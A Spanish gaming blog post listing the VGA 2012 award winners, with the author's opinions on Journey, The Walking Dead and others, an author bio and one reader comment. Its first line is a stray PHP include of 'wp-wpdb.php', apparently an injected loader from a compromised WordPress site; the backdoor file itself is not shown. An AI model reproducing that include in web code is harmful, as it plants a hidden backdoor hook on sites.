if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Ganadores Premios VGA 2012, e impresiones – La Fortaleza de LeChuck

Ganadores Premios VGA 2012, e impresiones

Como cada año se han entregado los oscars de los videojuegos, los populares VGA, que reparten y emiten anualmente el canal Spike TV. Como novedad este año, se ha quitado la absurda restricción por paises del streaming, ya que en las anteriores ediciones los gamers no residentes en EE.UU. hemos tenido que hacer malabarismos para poder seguirlos. Este año también Xbox Live ofrecía un streaming exclusivo con encuestas interactivas. Vamos a repasar esos ganadores.

Estos son los galardonados de los premios VGA 2012:

Mejor actuación masculina:
Dameon Clarke as Handsome Jack – Borderlands 2

Mejor actuación femenina:
Melissa Hutchinson as Clementine – The Walking Dead: The Game

Mejor Banda sonora:
Journey

Mejor apartado gráfico:
Halo 4

Mejor Juego de Xbox 360:
Halo 4

Mejor Juego de PS3:
Journey

Mejor Juego de Wii/Wii-U:
New Super Mario Bros. U

Mejor Juego de PC:
XCOM: Enemy Unknown

Mejor Shooter:
Borderlands 2

Mejor RPG:
Mass Effect 3

Mejor Multijugador:
Borderlands 2

Mejor Juego de Acción/Aventura:
Dishonored

Mejor Juego de deportes individual:
SSX

Mejor Juego de deportes en equipo:
NBA 2K13

Mejor Juego de conducción:
Need For Speed: Most Wanted

Mejor canción en un juego:
Cities» by Beck – Soundshapes

Mejor Juego de lucha:
Persona 4 Arena

Mejor Juego de portatil:
Soundshapes

Mejor Adaptación:
The Walking Dead: The Game

Mejor Juego independiente: 
Journey

Mejor Personaje:
Clap Trap – Borderlands 2

Mejor Contenido Descargable (DLC):
Dawnguard – The Elder Scrolls V: Skyrim

Mejor Juego descargable:
The Walking Dead: The Game

Mejor Juego social:
You Don’t Know Jack

Videojuego más esperado:
Grand Theft Auto V

Estudio del año:
Telltale Games

Mejor Videojuego de la década:
Half Life 2

Juego del año (GOTY):
The Walking Dead: The Game

Como veis The Walking Dead ha sido la sorpresa de la noche, llevándose el GOTY, además del mejor juego descargable, adaptación y estudio del año. No le quito mérito, es una buena aventura pero quizá la gente ha estado demasiado influenciada por los cómics o la serie. A mí su GOTY me ha dejado la sensación de que le queda grande compitiendo con juegos como Dishonored. La gran injusticia fue que se llevara el premio a la mejor actuación femenina, cuando Jennifer Hale con su brillante interpretación de Shepard mujer debería haber sido la ganadora.
Pasemos a hablar de lo que para mí es el verdadero GOTY, Journey, un título que no deja indiferente a nadie. Un viaje onírico a traves de las dunas del desierto acompañados de viajeros anónimos y melodías penetrantes. Journey es una muestra de que los videojuegos pueden estar exentos de texto para transmitir mil sensaciones. Me alegra comprobar que a la gente le ha llegado el mensaje de Journey al alzarse con el premio al mejor juego de PS3, independiente, y por supuesto, banda sonora original.
Borderlands 2 ha sido otro bien recompensado con los premios al mejor personaje, multijugador y shooter. Creo que va siendo hora de hacerme con él, ¿no?

Me ha parecido fuera de lugar juntar en un premio Wii y Wii U. La nueva consola de Nintendo acaba de salir, y no tiene catálogo apenas. ¿Y cuál ha sido la consecuencia de esta fusión? Que gane un Mario más del montón y Xenoblade y The Last Story se quedaran sin posibilidad de premio.

Sorprendentemente Call of Duty: Black Ops 2 ha resultado el gran perdedor, parece que sacar un COD al año puede ser un éxito comercial, pero no creativo. Otro que se iba de vacío ha sido Diablo III, ya que Mass Effect 3 curiosamente le ha levantado el premio al mejor RPG. El último de la trilogía espacial, a pesar de los numerosos bugs, glitches y polémica con el final, se ha hecho con la estatuilla. Sinceramente yo se la hubiera entregado a Xenoblade, una pena que en los VGA no sepan apreciar el trabajo de los estudios japoneses más allá de los juegos habituales de Nintendo. Al menos vemos el título nipón Persona 4 Arena llevarse el premio al mejor juego de lucha.
Lo de Halo 4 estaba realmente cantado, el agresivo marketing y millonario presupuesto le ha valido para crear el primer título de una nueva trilogía con una calidad gráfica soberbia y digna de ese premio y el de mejor juego de Xbox 360.
En el apartado de videojuego más esperado y mejor videojuego de la época, no hay sorpresas. A pesar de que los oponentes eran gigantes, ha quedado claro el hype que tiene la gente por la llegada de GTA V, o la cantidad de fans que procesa Half Life 2.
Destacar durante la gala los nuevos videos de The Last of Us, Bioshock Infinite, el misterioso «The Phantom Pain» o el bombazo con el trailer del próximo Dark Souls II.

Y ahora os toca a vosotros, ¿Qué os han parecido los premiados?

Publicada el
Categorizado como Opinión

Por Arashi

Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

2 comentarios

  1. The Walking Dead me parece un MUY buen juego. Un gran juego. PERO, para mí, un GOTY solo se lo puede llevar un juego lo más amplio posible, lo que suelen intentar los AAA, que es "tenerlo todo". Un puzzle, jamás será un GOTY, como tampoco debería una aventura como The Walking Dead al ser de un género "menor" que no todo el mundo sabe y puede disfrutar. Es una forma de pensar

Dejar un comentario